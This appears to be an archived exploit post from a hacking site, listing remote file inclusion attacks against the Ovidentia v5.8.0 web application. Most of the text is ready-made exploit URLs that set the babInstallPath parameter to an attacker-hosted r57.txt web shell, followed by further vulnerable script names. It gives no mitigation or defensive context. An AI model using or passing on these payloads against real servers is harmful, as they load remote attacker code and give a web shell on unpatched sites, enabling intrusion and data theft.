AOH :: HP Unsorted O :: B06-2638.HTM

Ovidentia v5.8.0 multiple file include exploits



multiple file inclusion exploits in ovidentia v5.8.0
multiple file inclusion exploits in ovidentia v5.8.0



multiple file inclusion exploits in ovidentia v5.8.0=0D
=0D
forum type : ovidentia v5.8.0=0D
bug found by : black-code&sweet-devil=0D
team : site-down=0D
type : file include =0D
=0D
####################################################=0D
exploits :=0D
=0D
=0D
http://www.example.com/orid/index.php?babInstallPath=http://Yoursite.com/r57.txt?=0D 
=0D
http://www.example.com/orid/ovidentia/topman.php?babInstallPath=http://Yoursite.com/r57.txt?=0D 
=0D
http://www.example.com/orid/ovidentia/approb.php?babInstallPath=http://Yoursite.com/r57.txt?=0D 
=0D
http://www.example.com/orid/ovidentia/vacadmb.php?babInstallPath=http://Yoursite.com/r57.txt?=0D 
=0D
http://www.example.com/orid/ovidentia/vacadma.php?babInstallPath=http://Yoursite.com/r57.txt?=0D 
=0D
http://www.example.com/orid/ovidentia/vacadm.php?babInstallPath=http://Yoursite.com/r57.txt?=0D 
=0D
http://www.example.com/orid/ovidentia/statart.php?babInstallPath=http://Yoursite.com/r57.txt?=0D 
=0D
http://www.example.com/orid/ovidentia/search.php?babInstallPath=http://Yoursite.com/r57.txt?=0D 
=0D
http://www.example.com/orid/ovidentia/posts.php?babInstallPath=http://Yoursite.com/r57.txt?=0D 
=0D
http://www.example.com/orid/ovidentia/options.php?babInstallPath=http://Yoursite.com/r57.txt?=0D 
=0D
=0D
=0D
And more pages are vulnerabe in the directory  /ovidentia/ with the same variable, =0D
=0D
as an example :=0D
=0D
login.php=0D
=0D
frchart.php=0D
=0D
flbchart.php=0D
=0D
fileman.php=0D
=0D
faq.php=0D
=0D
event.php=0D
=0D
directory.php=0D
=0D
articles.php=0D
=0D
artedit.php=0D
=0D
approb.php=0D
=0D
calday.php=0D
=0D
=0D
And more .. ;)=0D
=0D
=0D
=0D
####################################################=0D
=0D
=0D
=0D
#######################=0D
emails: =0D
=0D
black-cod3@hotmail.com & gamr-14@hotmail.com=0D 
#######################=0D
=0D
=0D
All my respect to our friends , lezr.com , g123g.net =0D
=0D
=0D
done .. peace

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.